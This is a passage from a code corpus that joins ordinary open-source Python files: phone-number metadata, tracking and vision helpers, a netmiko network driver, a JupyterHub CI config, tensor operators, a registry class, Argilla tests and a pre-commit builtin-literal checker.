mobile=PhoneNumberDesc(national_number_pattern='(?:5\\d{5}|8(?:1(?:0(?:000|[3-9]\\d\\d)|(?:1(?:0[236]|1\\d)|(?:2[0-59]|[3-79]\\d)\\d)\\d)|2(?:0(?:000|(?:19|[2-7]\\d)\\d)|(?:(?:[124-6]\\d|3[5-9])\\d|7(?:[0-79]\\d|8[13-9])|8(?:[2-6]\\d|7[01]))\\d)|[349]\\d{4}))\\d\\d|5(?:(?:[02]\\d|5[0-478])\\d|1(?:[0-8]\\d|95)|6(?:4[0-4]|5[1-589]))\\d{3}', example_number='51234567', possible_length=(7, 8)),
toll_free=PhoneNumberDesc(national_number_pattern='800(?:(?:0\\d\\d|1)\\d|[2-9])\\d{3}', example_number='80012345', possible_length=(7, 8, 10)),
premium_rate=PhoneNumberDesc(national_number_pattern='(?:40\\d\\d|900)\\d{4}', example_number='9001234', possible_length=(7, 8)),
personal_number=PhoneNumberDesc(national_number_pattern='70[0-2]\\d{5}', example_number='70012345', possible_length=(8,)),
no_international_dialling=PhoneNumberDesc(national_number_pattern='800[2-9]\\d{3}', possible_length=(7,)),
number_format=[NumberFormat(pattern='(\\d{3})(\\d{4})', format='\\1 \\2', leading_digits_pattern=['[369]|4[3-8]|5(?:[0-2]|5[0-478]|6[45])|7[1-9]|88', '[369]|4[3-8]|5(?:[02]|1(?:[0-8]|95)|5[0-478]|6(?:4[0-4]|5[1-589]))|7[1-9]|88']),
NumberFormat(pattern='(\\d{4})(\\d{3,4})', format='\\1 \\2', leading_digits_pattern=['[45]|8(?:00|[1-49])', '[45]|8(?:00[1-9]|[1-49])']),
NumberFormat(pattern='(\\d{2})(\\d{2})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['7']),
NumberFormat(pattern='(\\d{4})(\\d{3})(\\d{3})', format='\\1 \\2 \\3', leading_digits_pattern=['8'])],
mobile_number_portable_region=True)
# ===== /mmtrack/core/track/correlation.py (repo: open-mmlab/mmtracking, license: Apache-2.0) =====
# Copyright (c) OpenMMLab. All rights reserved.
import torch.nn.functional as F
def depthwise_correlation(x, kernel):
"""Depthwise cross correlation.
This function is proposed in
`SiamRPN++ <https://arxiv.org/abs/1812.11703>`_.
Args:
x (Tensor): of shape (N, C, H_x, W_x).
kernel (Tensor): of shape (N, C, H_k, W_k).
Returns:
Tensor: of shape (N, C, H_o, W_o). H_o = H_x - H_k + 1. So does W_o.
"""
batch = kernel.size(0)
channel = kernel.size(1)
x = x.view(1, batch * channel, x.size(2), x.size(3))
kernel = kernel.view(batch * channel, 1, kernel.size(2), kernel.size(3))
out = F.conv2d(x, kernel, groups=batch * channel)
out = out.view(batch, channel, out.size(2), out.size(3))
return out
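# Shape-check sketch (illustrative):
#   import torch
#   x = torch.randn(2, 16, 31, 31)       # (N, C, H_x, W_x)
#   kernel = torch.randn(2, 16, 7, 7)    # (N, C, H_k, W_k)
#   out = depthwise_correlation(x, kernel)
#   out.shape                            # -> (2, 16, 25, 25), since H_o = 31 - 7 + 1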
# ===== /frame_2D_alg/alternative versions/compare_draft.py (repo: boris-kz/CogAlg, license: CC-BY-4.0, MIT) =====
|
import numpy as np
from cmath import phase
from math import hypot
# flags:
f_angle = 0b00000001
f_rng_incr = 0b00000010
# ************ FUNCTIONS ************************************************************************************************
# -compare_i()
# -construct_input_array()
# -convolve()
# -calc_g_fold_dert()
# -accumulated_d_()
# -calc_angle()
# ***********************************************************************************************************************
'''
Kernel-based version of:
Comparison of input param between derts at range=rng, summing derivatives from shorter + current range comps per pixel
Input is pixel brightness p or gradient g in dert[0] or angle a in dert[1]: g_dert = g, (dy, dx); ga_dert = g, a, (dy, dx)
if fa: compute and compare angle from dy, dx in dert[-1], only for g_dert in 2nd intra_comp of intra_blob
else: compare input param in dert[fia]: p|g in derts[cyc][0] or angle a in dert[1]
flag ga: i_dert = derts[cyc][fga], both fga and fia are set for current intra_blob forks and potentially recycled
flag ia: i = i_dert[fia]: selects dert[1] for incremental-range comp angle only
'''
def compare(P_, _dert___, i__, bounds, indices, flags): # comparison of input param between derts at range = rng
# _dert___ in blob ( dert__ in P_ line ( dert_ in P
rng = _dert___.maxlen
fa = flags & f_angle
fga = fa and (flags & -f_rng_incr) # why comp_g only?
fia = fa and (flags & f_rng_incr) # why fa, it can be for gradient of angle as well as for angle of angle?
cyc = -rng - 1 + fia
derts__, i_ = construct_input_array(P_, bounds, flags, cyc, fa, fga, fia) # construct input array with predetermined shape
if not flags: # hypot_g, returns current line derts__
return derts__, i_
_dert___.appendleft(derts__)
if len(_dert___) == 0: # no i__:
return [], i_ # return empty _derts__
if i__.shape[0] <= rng * 2: # incomplete _dert___:
return [], np.concatenate((i__, i_), axis=0) # return empty _derts__
i__ = np.concatenate((i__[1:], i_), axis=0) # discard top line, append last line i__
d_ = convolve(i__, kernels[rng], indices, rng) # convolve i__ with kernels
if flags & f_rng_incr: # accumulate with
d_ += accumulated_d_(_dert___[0]) # derts on rng-higher line
_derts__ = calc_g_fold_dert(_dert___.pop(), d_, indices, bounds, flags)
return _derts__ , i__
# ---------- compare_i() end --------------------------------------------------------------------------------------------
def construct_input_array(P_, bounds, flags, cyc, fa, fga, fia): # unfold P_
if flags: # not hypot_g()
start, end = bounds
calc_a = fa and not fia
derts__ = []
i_ = np.empty(shape=(1, end - start), dtype=int)
for P in P_:
if not calc_a:
derts_ = P.derts_
else: # compute angles
derts_ = [calc_angle(derts) for derts in P.derts_]
derts__.append((P.x0, derts_)) # unfold into derts__
index = P.x0 - start
i_[0, index: index + P.L] = [derts[cyc][fga][fia] for derts in derts_] # construct input array for comparison
else: # do hypot_g():
derts__ = [(P.x0, [[(p,), (int(hypot(dy, dx)), (dy, dx))] for p, g, dy, dx in P.dert_]) for P in P_] # unfold into derts__
i_ = None # no comparison
return derts__, i_
# ---------- construct_input_array() end --------------------------------------------------------------------------------
def convolve(a, k, indices, rng): # apply kernel, return array of dx, dy
# d_[0, :]: array of dy
# d_[1, :]: array of dx
d_ = np.empty((2, a.shape[1]))
d_[:, indices] = [(a[:, i-rng:i+rng+1] * k).sum(axis=(1, 2)) for i in indices]
return d_
# ---------- convolve() end ---------------------------------------------------------------------------------------------
def calc_g_fold_dert(derts__, d_, indices, bounds, flags): # compute g using array of dx, dy. fold dert
x0, xn = bounds
g_ = np.empty((d_.shape[1],))
g_[indices] = np.hypot(d_[0, indices], d_[1, indices])
new_derts__ = []
# append new dert into new_derts
# ...
return new_derts__
# ---------- calc_g_fold_dert() end -------------------------------------------------------------------------------------
def accumulated_d_(derts__):
return
# ---------- accumulated_d_() end ---------------------------------------------------------------------------------------
def calc_angle(derts): # compute a, return derts with angle
g = derts[-1][0]
dy, dx = derts[-1][-1]
a = (dx + dy * 1j) / g
a_radian = phase(a)
derts[-1][1].insert(a, a_radian) # a = dert[1], for i = dert[fia]
return derts[-1]
# ---------- calc_angle() end -----------------------------------------------------------------------------------------------
# ===== /netmiko/ruijie/ruijie_os.py (repo: ktbyers/netmiko, license: MIT) =====
|
"""Ruijie RGOS Support"""
import time
from typing import Any
from netmiko.cisco_base_connection import CiscoBaseConnection
class RuijieOSBase(CiscoBaseConnection):
def session_preparation(self) -> None:
"""Prepare the session after the connection has been established."""
self._test_channel_read(pattern=r"[>#]")
self.set_base_prompt()
"""Ruijie OS requires enable mode to set terminal width"""
self.enable()
self.set_terminal_width(command="terminal width 256", pattern="terminal")
self.disable_paging(command="terminal length 0")
# Clear the read buffer
time.sleep(0.3 * self.global_delay_factor)
self.clear_buffer()
def save_config(
self, cmd: str = "write", confirm: bool = False, confirm_response: str = ""
) -> str:
"""Save config: write"""
return super().save_config(
cmd=cmd, confirm=confirm, confirm_response=confirm_response
)
class RuijieOSSSH(RuijieOSBase):
pass
class RuijieOSTelnet(RuijieOSBase):
def __init__(self, *args: Any, **kwargs: Any) -> None:
default_enter = kwargs.get("default_enter")
kwargs["default_enter"] = "\r\n" if default_enter is None else default_enter
super().__init__(*args, **kwargs)
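# Usage sketch (illustrative; host and credentials are placeholders):
#   from netmiko import ConnectHandler
#   conn = ConnectHandler(device_type="ruijie_os", host="192.0.2.1",
#                         username="admin", password="secret")
#   print(conn.send_command("show version"))
#   conn.disconnect()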
# ===== /ci/config_token.py (repo: jupyterhub/jupyterhub-deploy-docker, license: BSD-3-Clause) =====
|
c.JupyterHub.load_roles = [ # noqa: F821
{
"name": "test-admin",
"scopes": ["admin:users", "admin:servers", "access:servers"],
"services": ["test"],
}
]
c.JupyterHub.services = [ # noqa: F821
{
"name": "test",
"api_token": "test-token-123",
}
]
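# With these roles, the "test" service can call the Hub REST API with its
# api_token, e.g. (illustrative; the hub host is a placeholder):
#   curl -H "Authorization: token test-token-123" http://hub:8081/hub/api/users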
# ===== /tests/common/test_op/ascend/apply_add_sign.py (repo: mindspore-ai/akg, license: Apache-2.0 and others) =====
|
# Copyright 2020-2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""operator dsl function: apply_add_sign"""
import akg
from akg import topi, tvm
import akg.utils as utils
from akg.utils.dsl_create import TensorUtils
from akg.utils.format_transform import get_shape
from akg.ops.math.ascend import Sign
def _apply_add_sign_compute(var, m, grad, lr, alpha, sign_decay, beta):
"""Compute apply_add_sign"""
m_out = _update_m(m, beta, grad)
sign_gm = topi.multiply(Sign(grad), Sign(m_out))
decay_gm = topi.multiply(sign_gm, sign_decay)
var_out = _update_var(decay_gm, alpha, lr, grad, var)
return var_out, m_out
def _update_m(m, beta, grad):
"""Update m_out = m * beta + grad * (1 - beta)"""
m_beta = topi.multiply(m, beta)
beta_neg = topi.multiply(beta, tvm.const(-1, beta.dtype))
beta_1 = topi.add(beta_neg, tvm.const(1, beta_neg.dtype))
grad_beta_gs = topi.multiply(grad, beta_1)
m_out = topi.add(m_beta, grad_beta_gs)
return m_out
def _update_var(decay_gm, alpha, lr, grad, var):
"""Update var_out = var - lr * (alpha + decay_gm) * grad"""
decay_gm_alpha = topi.add(decay_gm, alpha)
res = topi.multiply(decay_gm_alpha, lr)
res = topi.multiply(res, grad)
res_neg = topi.multiply(res, tvm.const(-1, res.dtype))
var_out = topi.add(var, res_neg)
return var_out
@utils.check_input_type(*([tvm.tensor.Tensor] * 7), (str, type(None)))
def apply_add_sign(var, m, grad, lr, alpha, sign_decay, beta, target=utils.CCE):
"""
Update 'var' according to the AddSign update.
m_out = m * beta + grad * (1 - beta)
var_out = var - lr * (alpha + sign_decay * Sign(grad) * Sign(m)) * grad
Args:
var (tvm.tensor.Tensor): A tensor of type float16 or float32
m (tvm.tensor.Tensor): A tensor of type float16 or float32
grad (tvm.tensor.Tensor): A tensor of type float16 or float32
lr (tvm.tensor.Tensor): A scalar tensor of type float16 or float32
alpha (tvm.tensor.Tensor): A scalar tensor of type float16 or float32
sign_decay (tvm.tensor.Tensor): A scalar tensor of type float16 or float32
beta (tvm.tensor.Tensor): A scalar tensor of type float16 or float32
Returns:
tvm.tensor.Tensor, updated var.
tvm.tensor.Tensor, updated m.
"""
utils.ops_dtype_check(var.dtype, utils.DtypeForDavinci.ALL_FLOAT)
for i in (m, lr, alpha, sign_decay, beta, grad):
utils.elemwise_dtype_check(var.dtype, i.dtype)
for i in (m, grad):
utils.elemwise_shape_check(var.shape, i.shape)
for i in (lr, alpha, sign_decay, beta):
if tuple(get_shape(i)) != (1,):
raise RuntimeError("lr, alpha, sign_decay and beta only support scalar.")
out_var, out_m = _apply_add_sign_compute(var, m, grad, lr, alpha, sign_decay, beta)
out_var, binds_info = TensorUtils.inplace_set(var, out_var, "var_buf")
out_m, binds_info2 = TensorUtils.inplace_set(m, out_m, "m_buf")
binds_info.update(binds_info2)
attrs = {utils.BINDS: binds_info}
return out_var, out_m, attrs
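A plain NumPy restatement of the same update can serve as a reference when checking the DSL above; it is a sketch only and does not use the akg/tvm API.
# Hypothetical NumPy reference for the AddSign update computed above (not part of akg).
import numpy as np

def apply_add_sign_reference(var, m, grad, lr, alpha, sign_decay, beta):
    """Return (var_out, m_out) following the same formulas as the DSL implementation."""
    m_out = m * beta + grad * (1.0 - beta)
    decay_gm = sign_decay * np.sign(grad) * np.sign(m_out)
    var_out = var - lr * (alpha + decay_gm) * grad
    return var_out, m_out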
|
d83f62132400895966b21b270b1509a6b63fcb92
|
e61e664d95af3b93150cda5b92695be6551d2a7c
|
/vega/algorithms/nas/modnas/registry/registry.py
|
bab93f464b099d8c302c99f7363da01bd2c5d68d
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] |
permissive
|
huawei-noah/vega
|
44aaf8bb28b45f707ed6cd4e871ba70fc0c04846
|
12e37a1991eb6771a2999fe0a46ddda920c47948
|
refs/heads/master
| 2023-09-01T20:16:28.746745
| 2023-02-15T09:36:59
| 2023-02-15T09:36:59
| 273,667,533
| 850
| 184
|
NOASSERTION
| 2023-02-15T09:37:01
| 2020-06-20T08:20:06
|
Python
|
UTF-8
|
Python
| false
| false
| 2,158
|
py
|
registry.py
|
# -*- coding:utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Default registry."""
import logging
from typing import Any
logger = logging.getLogger('modnas.registry')
class Registry():
"""Registry class."""
def __init__(self, allow_replace: bool = False) -> None:
self.allow_replace = allow_replace
self._reg_class = {}
def get_full_path(self, reg_path: str, reg_id: str) -> str:
"""Return full registration path."""
return '{}.{}'.format(reg_path, reg_id)
def get_reg_name(self, reg_path: str, reg_id: str) -> str:
"""Return proper registration name."""
name = self.get_full_path(reg_path, reg_id)
return name.lower().replace('-', '').replace('_', '').replace(' ', '')
def register(self, regclass: Any, reg_path: str, reg_id: str) -> None:
"""Register a component class."""
reg_id = self.get_reg_name(reg_path, reg_id)
if reg_id in self._reg_class:
logger.warning('re-register id: {}'.format(reg_id))
if not self.allow_replace:
raise ValueError('Cannot re-register id: {}'.format(reg_id))
self._reg_class[reg_id] = regclass
logger.debug('registered: {}'.format(reg_id))
def get(self, reg_path: str, reg_id: str) -> Any:
"""Return registered class by name."""
reg_id = self.get_reg_name(reg_path, reg_id)
if reg_id not in self._reg_class:
raise ValueError('id \'{}\' not found in registry'.format(reg_id))
return self._reg_class[reg_id]
registry = Registry()
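A short usage sketch of the module-level registry defined above; the class name and registration path below are made up for illustration.
# Illustrative only: register a component and look it up through the global instance.
class MyBackbone:
    pass

registry.register(MyBackbone, 'arch_space', 'my-backbone')
# Lookups are case-, dash- and underscore-insensitive thanks to get_reg_name().
assert registry.get('arch_space', 'My_Backbone') is MyBackbone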
|
03acc80083655efcef67397e6555ee93c0bcbdc1
|
2337351b228818e41be3002bd38f68f77c2aa074
|
/sa/profiles/Raisecom/ROS/get_mac_address_table.py
|
a6fa36aa8121f97fb8bb0d8c369b02cfd5b52f90
|
[
"BSD-3-Clause"
] |
permissive
|
nocproject/noc
|
57d40c680a1499374463e472434f9595ed6d1374
|
6e6d71574e9b9d822bec572cc629a0ea73604a59
|
refs/heads/master
| 2023-08-31T01:11:33.544573
| 2023-08-30T17:31:11
| 2023-08-30T17:31:11
| 107,815,776
| 105
| 33
|
BSD-3-Clause
| 2023-07-31T07:57:45
| 2017-10-21T21:04:33
|
Python
|
UTF-8
|
Python
| false
| false
| 1,567
|
py
|
get_mac_address_table.py
|
# ---------------------------------------------------------------------
# Raisecom.ROS.get_mac_address_table
# ---------------------------------------------------------------------
# Copyright (C) 2007-2017 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# Python modules
import re
# NOC modules
from noc.sa.profiles.Generic.get_mac_address_table import Script as BaseScript
from noc.sa.interfaces.igetmacaddresstable import IGetMACAddressTable
class Script(BaseScript):
name = "Raisecom.ROS.get_mac_address_table"
interface = IGetMACAddressTable
rx_line = re.compile(
r"^(?P<mac>[0-9a-f]{4}\.[0-9a-f]{4}\.[0-9a-f]{4})\s+"
r"(?P<interface>(?:P|PC|port|gigaethernet1/1/)?\d+)\s+"
r"(?P<vlan_id>\d+)\s*(?P<type>Hit|Static|dynamic)",
re.MULTILINE | re.IGNORECASE,
)
def execute_cli(self, interface=None, vlan=None, mac=None):
if not self.is_iscom2624g:
v = self.cli("show mac-address-table l2-address")
else:
v = self.cli("show mac-address all")
r = []
for match in self.rx_line.finditer(v):
r += [
{
"vlan_id": match.group("vlan_id"),
"mac": match.group("mac"),
"interfaces": [match.group("interface")],
"type": {"hit": "D", "dynamic": "D", "static": "S"}[
match.group("type").lower()
],
}
]
return r
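The parsing regex can be checked in isolation; the sample line below is invented but follows the format the pattern expects.
# Stand-alone check of the rx_line pattern above (the sample output line is made up).
import re

rx_line = re.compile(
    r"^(?P<mac>[0-9a-f]{4}\.[0-9a-f]{4}\.[0-9a-f]{4})\s+"
    r"(?P<interface>(?:P|PC|port|gigaethernet1/1/)?\d+)\s+"
    r"(?P<vlan_id>\d+)\s*(?P<type>Hit|Static|dynamic)",
    re.MULTILINE | re.IGNORECASE,
)
sample = "000a.1b2c.3d4e port10 100 dynamic"
match = rx_line.search(sample)
assert match and match.group("vlan_id") == "100" and match.group("interface") == "port10"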
|
4155f42d48b7e52987817f66d1a279d84164bd89
|
fae16a539b7c1b0525aab40ddaeee3e451fc9b74
|
/tests/integration/client/feedback/dataset/remote/test_filtered.py
|
e550e6d912810b9dc21aa7d1e7cd8adf0f639c72
|
[
"LicenseRef-scancode-free-unknown",
"Apache-2.0"
] |
permissive
|
argilla-io/argilla
|
a6b45f7f64e9db82f6d9a61771d758ffbb3dab4a
|
7c1b2368b444b7b7a281d37ad51bcb2d8e92acf5
|
refs/heads/develop
| 2023-09-04T03:58:05.914619
| 2023-09-01T15:58:31
| 2023-09-01T15:58:31
| 362,500,938
| 1,085
| 122
|
Apache-2.0
| 2023-09-14T15:31:07
| 2021-04-28T14:37:42
|
Python
|
UTF-8
|
Python
| false
| false
| 4,789
|
py
|
test_filtered.py
|
# Copyright 2021-present, the Recognai S.L. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import List, Union
import pytest
from argilla.client import api
from argilla.client.feedback.dataset.local import FeedbackDataset
from argilla.client.feedback.dataset.remote.filtered import FilteredRemoteFeedbackDataset, FilteredRemoteFeedbackRecords
from argilla.client.feedback.schemas.records import FeedbackRecord, RemoteFeedbackRecord
from argilla.client.sdk.users.models import UserRole
from argilla.client.sdk.v1.datasets.models import FeedbackResponseStatusFilter
from tests.factories import DatasetFactory, RecordFactory, TextFieldFactory, TextQuestionFactory, UserFactory
@pytest.mark.asyncio
class TestFilteredRemoteFeedbackDataset:
@pytest.mark.parametrize("role", [UserRole.owner, UserRole.admin])
@pytest.mark.parametrize(
"status",
[
FeedbackResponseStatusFilter.draft,
FeedbackResponseStatusFilter.missing,
FeedbackResponseStatusFilter.discarded,
FeedbackResponseStatusFilter.submitted,
[FeedbackResponseStatusFilter.discarded, FeedbackResponseStatusFilter.submitted],
],
)
async def test_filter_by(
self, role: UserRole, status: Union[FeedbackResponseStatusFilter, List[FeedbackResponseStatusFilter]]
) -> None:
dataset = await DatasetFactory.create()
await TextFieldFactory.create(dataset=dataset, required=True)
await TextQuestionFactory.create(dataset=dataset, required=True)
await RecordFactory.create_batch(dataset=dataset, size=10)
user = await UserFactory.create(role=role, workspaces=[dataset.workspace])
api.init(api_key=user.api_key)
remote_dataset = FeedbackDataset.from_argilla(id=dataset.id)
filtered_dataset = remote_dataset.filter_by(response_status=status)
assert isinstance(filtered_dataset, FilteredRemoteFeedbackDataset)
assert isinstance(filtered_dataset.records, FilteredRemoteFeedbackRecords)
assert all([isinstance(record, RemoteFeedbackRecord) for record in filtered_dataset.records])
@pytest.mark.parametrize("role", [UserRole.owner, UserRole.admin])
@pytest.mark.parametrize(
"status",
[
FeedbackResponseStatusFilter.draft,
FeedbackResponseStatusFilter.missing,
FeedbackResponseStatusFilter.discarded,
FeedbackResponseStatusFilter.submitted,
[FeedbackResponseStatusFilter.discarded, FeedbackResponseStatusFilter.submitted],
],
)
async def test_not_implemented_methods(
self, role: UserRole, status: Union[FeedbackResponseStatusFilter, List[FeedbackResponseStatusFilter]]
) -> None:
dataset = await DatasetFactory.create()
text_field = await TextFieldFactory.create(dataset=dataset, required=True)
await TextQuestionFactory.create(dataset=dataset, required=True)
await RecordFactory.create_batch(dataset=dataset, size=10)
user = await UserFactory.create(role=role, workspaces=[dataset.workspace])
api.init(api_key=user.api_key)
remote_dataset = FeedbackDataset.from_argilla(id=dataset.id)
filtered_dataset = remote_dataset.filter_by(response_status=status)
assert isinstance(filtered_dataset, FilteredRemoteFeedbackDataset)
with pytest.raises(NotImplementedError, match="`records.delete` does not work for filtered datasets."):
filtered_dataset.delete_records(remote_dataset.records[0])
with pytest.raises(NotImplementedError, match="`records.delete` does not work for filtered datasets."):
filtered_dataset.records.delete(remote_dataset.records[0])
with pytest.raises(NotImplementedError, match="`records.add` does not work for filtered datasets."):
filtered_dataset.add_records(FeedbackRecord(fields={text_field.name: "test"}))
with pytest.raises(NotImplementedError, match="`records.add` does not work for filtered datasets."):
filtered_dataset.records.add(FeedbackRecord(fields={text_field.name: "test"}))
with pytest.raises(NotImplementedError, match="`delete` does not work for filtered datasets."):
filtered_dataset.delete()
|
855295772a8310d88aabc5c8e126834db85abc90
|
6b4dbc04e8b2513634e8d25b9f8b69c82c07b6fe
|
/test/UdsTest.py
|
a49c458731bc1309f43f8cb2a7c8a26c2e023000
|
[
"MIT"
] |
permissive
|
pylessard/python-udsoncan
|
57c62b59a88907c6a988501c65efa14cfb8153a0
|
1b93cc3cd0e09a21d48881ba53aed257f841bb89
|
refs/heads/master
| 2023-08-29T21:49:55.403246
| 2023-06-24T15:46:46
| 2023-06-24T15:46:46
| 99,459,987
| 477
| 181
|
MIT
| 2023-06-30T15:29:30
| 2017-08-06T02:40:37
|
Python
|
UTF-8
|
Python
| false
| false
| 177
|
py
|
UdsTest.py
|
import unittest
import logging
import sys
class UdsTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
unittest.TestCase.__init__(self, *args, **kwargs)
|
63c8a5a4990fa74b3630c8de997acb7e8ef56737
|
ab40571d5051ad53c0f205fa797ba36eac516d06
|
/language/xsp/data_preprocessing/nl_to_sql_example.py
|
c7e828bd70f3e0382c31e2a12928ed517c9a6dd2
|
[
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
google-research/language
|
e941b1a92ab46d40d8d03bb0c314905cb6902ce2
|
ac9447064195e06de48cc91ff642f7fffa28ffe8
|
refs/heads/master
| 2023-08-24T23:10:13.207294
| 2023-05-25T20:47:18
| 2023-05-25T22:29:27
| 153,201,352
| 1,567
| 371
|
Apache-2.0
| 2023-07-06T23:03:15
| 2018-10-16T00:58:14
|
Python
|
UTF-8
|
Python
| false
| false
| 4,052
|
py
|
nl_to_sql_example.py
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Standard format for an example mapping from NL to SQL."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from language.xsp.data_preprocessing.language_utils import get_wordpieces
from language.xsp.data_preprocessing.language_utils import Wordpiece
from language.xsp.data_preprocessing.schema_utils import DatabaseTable
from language.xsp.data_preprocessing.schema_utils import get_schema_entities
from language.xsp.data_preprocessing.schema_utils import process_tables
from language.xsp.data_preprocessing.sql_utils import SQLQuery
class NLToSQLInput(object):
"""Contains information about the input to a NL to SQL model."""
def __init__(self):
self.original_utterance = None
self.utterance_wordpieces = list()
self.tables = list()
def to_json(self):
"""Returns the JSON form of this class."""
return {
'utterance_wordpieces': [
wordpiece.to_json() for wordpiece in self.utterance_wordpieces
],
'tables': [table.to_json() for table in self.tables],
'original_utterance': self.original_utterance
}
def from_json(self, dictionary):
"""Loads the NLToSQLInput attributes from a dictionary."""
self.original_utterance = dictionary['original_utterance']
self.tables = [
DatabaseTable().from_json(table) for table in dictionary['tables']
]
self.utterance_wordpieces = [
Wordpiece().from_json(wordpiece)
for wordpiece in dictionary['utterance_wordpieces']
]
return self
class NLToSQLExample(object):
"""Contains both inputs and outputs for a NL to SQL example."""
def __init__(self):
self.model_input = NLToSQLInput()
self.gold_sql_query = SQLQuery()
def to_json(self):
return {
'model_input': self.model_input.to_json(),
'gold_sql_query': self.gold_sql_query.to_json()
}
def from_json(self, dictionary):
self.model_input = self.model_input.from_json(dictionary['model_input'])
self.gold_sql_query = self.gold_sql_query.from_json(
dictionary['gold_sql_query'])
return self
def gold_query_string(self):
"""Generates a query string from the decoder actions for an example."""
gold_query = list()
for action in self.gold_sql_query.actions:
if action.symbol:
gold_query.append(action.symbol)
elif action.entity_copy:
copy_action = action.entity_copy
if copy_action.copied_table:
gold_query.append(copy_action.copied_table.original_table_name)
else:
gold_query.append(copy_action.copied_column.original_column_name)
else:
gold_query.append(action.utterance_copy.wordpiece)
return ' '.join(gold_query)
def populate_utterance(example, utterance, schema, tokenizer):
"""Sets the model input for a NLToSQLExample."""
example.model_input.original_utterance = utterance
schema_entities = get_schema_entities(schema)
# Set the utterance wordpieces
try:
wordpieces, aligned_schema_entities = get_wordpieces(
example.model_input.original_utterance, tokenizer, schema_entities)
example.model_input.utterance_wordpieces.extend(wordpieces)
# Set the table information
example.model_input.tables.extend(
process_tables(schema, tokenizer, aligned_schema_entities))
except UnicodeDecodeError as e:
    print(e)  # printing the exception directly works on both Python 2 and 3
return None
return example
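A minimal sketch of the input container's JSON shape, assuming the module above is importable; the utterance is invented.
# Illustrative only: an empty NLToSQLInput serializes to a small, predictable dictionary.
example_input = NLToSQLInput()
example_input.original_utterance = "how many flights leave boston"  # made-up utterance
print(example_input.to_json())
# {'utterance_wordpieces': [], 'tables': [], 'original_utterance': 'how many flights leave boston'}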
|
e397d09629a99610697e3de6dbce9f401b2ccd7a
|
2f7dc0184e5b4c0c15973b498c589de2d049e277
|
/pre_commit_hooks/check_builtin_literals.py
|
d3054aa075569f89b84529ae6093888d247c4197
|
[
"MIT"
] |
permissive
|
pre-commit/pre-commit-hooks
|
178ab044f0b18893d69521f13fc6cf9a29a13a09
|
3a569ca95749f562ff8b742e3568a077caeb5eb7
|
refs/heads/main
| 2023-08-18T02:31:00.550553
| 2023-08-15T14:18:50
| 2023-08-15T14:18:50
| 17,714,713
| 4,311
| 831
|
MIT
| 2023-09-14T20:13:15
| 2014-03-13T15:21:46
|
Python
|
UTF-8
|
Python
| false
| false
| 2,920
|
py
|
check_builtin_literals.py
|
from __future__ import annotations
import argparse
import ast
from typing import NamedTuple
from typing import Sequence
BUILTIN_TYPES = {
'complex': '0j',
'dict': '{}',
'float': '0.0',
'int': '0',
'list': '[]',
'str': "''",
'tuple': '()',
}
class Call(NamedTuple):
name: str
line: int
column: int
class Visitor(ast.NodeVisitor):
def __init__(
self,
ignore: Sequence[str] | None = None,
allow_dict_kwargs: bool = True,
) -> None:
self.builtin_type_calls: list[Call] = []
self.ignore = set(ignore) if ignore else set()
self.allow_dict_kwargs = allow_dict_kwargs
def _check_dict_call(self, node: ast.Call) -> bool:
return self.allow_dict_kwargs and bool(node.keywords)
def visit_Call(self, node: ast.Call) -> None:
if not isinstance(node.func, ast.Name):
# Ignore functions that are object attributes (`foo.bar()`).
# Assume that if the user calls `builtins.list()`, they know what
# they're doing.
return
if node.func.id not in set(BUILTIN_TYPES).difference(self.ignore):
return
if node.func.id == 'dict' and self._check_dict_call(node):
return
elif node.args:
return
self.builtin_type_calls.append(
Call(node.func.id, node.lineno, node.col_offset),
)
def check_file(
filename: str,
ignore: Sequence[str] | None = None,
allow_dict_kwargs: bool = True,
) -> list[Call]:
with open(filename, 'rb') as f:
tree = ast.parse(f.read(), filename=filename)
visitor = Visitor(ignore=ignore, allow_dict_kwargs=allow_dict_kwargs)
visitor.visit(tree)
return visitor.builtin_type_calls
def parse_ignore(value: str) -> set[str]:
return set(value.split(','))
def main(argv: Sequence[str] | None = None) -> int:
parser = argparse.ArgumentParser()
parser.add_argument('filenames', nargs='*')
parser.add_argument('--ignore', type=parse_ignore, default=set())
mutex = parser.add_mutually_exclusive_group(required=False)
mutex.add_argument('--allow-dict-kwargs', action='store_true')
mutex.add_argument(
'--no-allow-dict-kwargs',
dest='allow_dict_kwargs', action='store_false',
)
mutex.set_defaults(allow_dict_kwargs=True)
args = parser.parse_args(argv)
rc = 0
for filename in args.filenames:
calls = check_file(
filename,
ignore=args.ignore,
allow_dict_kwargs=args.allow_dict_kwargs,
)
